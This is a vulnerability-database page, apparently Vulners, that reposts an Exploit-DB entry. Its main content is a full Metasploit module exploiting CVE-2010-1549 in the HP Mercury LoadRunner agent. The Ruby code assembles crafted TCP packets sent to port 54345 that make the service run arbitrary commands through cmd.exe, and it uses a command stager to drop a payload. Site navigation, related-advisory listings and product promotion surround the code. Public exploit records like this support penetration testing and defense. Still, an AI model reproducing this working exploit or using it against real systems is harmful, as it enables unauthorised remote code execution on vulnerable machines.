Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

HP Mercury LoadRunner Agent magentproc.exe - Remote Command Execution (Metasploit)

🗓️ 01 Jan 2018 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 42 Views

HP LoadRunner Agent magentproc.exe Remote Command Executio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution Exploit
30 Dec 201700:00
zdt
Circl		CVE-2010-1549
1 Jan 201800:00
circl
CVE		CVE-2010-1549
7 May 201017:43
cve
Cvelist		CVE-2010-1549
7 May 201017:43
cvelist
d2		DSquare Exploit Pack: D2SEC_HPLR
7 May 201018:24
d2
Tenable Nessus		HP Mercury LoadRunner Agent Remote Command Execution
7 May 201000:00
nessus
Metasploit		HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution
8 Nov 201716:59
metasploit
NVD		CVE-2010-1549
7 May 201018:24
nvd
Packet Storm		HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution
30 Dec 201700:00
packetstorm
Prion		Code injection
7 May 201018:24
prion
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
      'Name'           => "HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution",
      'Description'    => %q{
        This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50
        and also HP Performance Center before 9.50. HP LoadRunner 12.53 and other versions are
        also most likely vulneable if the (non-default) SSL option is turned off.
        By sending a specially crafted packet, an attacker can execute commands remotely.
        The service is vulnerable provided the Secure Channel feature is disabled (default).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Original discovery # From Tenable Network Security
          'aushack'  # metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2010-1549'],
          ['ZDI', '10-080'],
          ['BID', '39965'],
          ['URL', 'https://support.hpe.com/hpsc/doc/public/display?docId=c00912968']
        ],
      'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Note: software reportedly supports Linux - may also be vulnerable.
          ['Windows (Dropper)',
          'Platform'   => 'win',
          'Arch'       => [ARCH_X86, ARCH_X64]
          ],
        ],
      'Privileged'     => false,
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'DisclosureDate' => 'May 06 2010',
      'DefaultTarget'  => 0))

      register_options([Opt::RPORT(54345)])
  end

  def autofilter
    true
  end

  def execute_command(cmd, _opts = {})
    guid = Rex::Text.encode_base64(Rex::Text.rand_text_alphanumeric(17))
    randstr = Rex::Text.rand_text_alpha(16)
    server_name = Rex::Text.rand_text_alpha(7)
    server_ip = datastore['LHOST']
    server_port = Rex::Text.rand_text_numeric(4)
    # If linux is one day supported, cmd1 = /bin/sh and cmd2 = -c cmd
    cmd1 = "C:\\Windows\\system32\\cmd.exe"
    cmd2 = "/C \"#{cmd}\""

    pkt1 = [0x19].pack('N') + guid + '0'

    pkt2 = [0x6].pack('N') + [0x0].pack('N') + "(-server_type=8)(-server_name=#{server_name})(-server_full_name=#{server_name})"
    pkt2 << "(-server_ip_name=#{server_ip})(-server_port=#{server_port})(-server_fd_secondary=4)(-guid_identifier=#{guid})\x00\x00"
    pkt2 << [0x7530].pack('N')

    pkt3 = [4 + pkt2.length].pack('N') + pkt2

    pkt4 = [0x1c].pack('N') + [0x05].pack('N') + [0x01].pack('N') + randstr + pkt3

    pkt5 = [pkt4.length].pack('N') + pkt4

    pkt6 = [0x437].pack('N') + [0x0].pack('N') + [0x31].pack('N') + [1].pack('N') + [0x31000000].pack('N')
    pkt6 << [cmd1.length].pack('N') + cmd1 + "\x00" + [cmd2.length].pack('N') + cmd2 + [0x0].pack('N') + [0x0].pack('N')

    pkt7 = [4 + pkt6.length].pack('N') + pkt6

    pkt8 = [0x18].pack('N') + [0x04].pack('N') + randstr + pkt7

    pkt9 = [pkt8.length].pack('N') + pkt8

    sploit = pkt1 + pkt5 + pkt9

    connect
    sock.put(sploit)
    disconnect
 end

  def exploit
      print_status('Sending payload...')
      execute_cmdstager(linemax: 1500)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jan 2018 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 210
EPSS0.88807
metasploitremote command executionhp loadrunnerhp performance centervulnerabilityssl optionsecure channelwindowscvezdibidcommand executiontcpnetwork securitydisclosuredate
42